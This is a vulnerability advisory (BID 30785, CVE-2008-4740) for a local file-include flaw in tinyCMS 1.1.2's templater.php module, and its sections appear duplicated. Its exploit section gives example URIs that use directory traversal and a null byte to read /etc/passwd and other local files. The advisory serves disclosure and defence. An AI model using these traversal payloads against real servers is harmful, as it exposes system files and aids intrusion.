tinyCMS 'templater.php' Local File Include Vulnerability
BID:30785
Info
tinyCMS 'templater.php' Local File Include Vulnerability
| Bugtraq ID: | 30785 |
| Class: | Input Validation Error |
| CVE: |
CVE-2008-4740 |
| Remote: | Yes |
| Local: | No |
| Published: | Aug 21 2008 12:00AM |
| Updated: | May 07 2015 05:24PM |
| Credit: | cOndemned |
| Vulnerable: |
1Scripts tinyCMS 1.1.2 |
| Not Vulnerable: | |
Discussion
tinyCMS 'templater.php' Local File Include Vulnerability
tinyCMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
tinyCMS 1.1.2 is vulnerable; other versions may also be affected.
tinyCMS is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to view local files within the context of the webserver process. Information harvested may aid in further attacks.
tinyCMS 1.1.2 is vulnerable; other versions may also be affected.
Exploit / POC
tinyCMS 'templater.php' Local File Include Vulnerability
Attackers can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
http://www.example.com/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00
Attackers can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../etc/passwd%00
http://www.example.com/[tinyCMS]/modules/ZZ_Templater/templater.php?config[template]=../../../../[local_file]%00
Solution / Fix
tinyCMS 'templater.php' Local File Include Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].